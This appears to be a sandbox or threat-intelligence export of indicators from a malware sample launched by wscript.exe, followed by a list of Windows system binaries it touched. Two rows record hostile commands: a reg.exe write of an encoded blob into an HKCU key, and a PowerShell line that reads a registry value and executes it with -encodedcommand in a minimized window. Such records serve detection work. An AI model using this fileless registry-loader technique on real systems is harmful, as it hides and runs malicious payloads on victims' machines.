parent_process | wscript.exe | martian_process | "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT | ||||||
parent_process | wscript.exe | martian_process | powershell $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane | %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane" |
file | C:\Windows\System32\reg.exe |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |
file | C:\Windows\System32\rundll32.exe |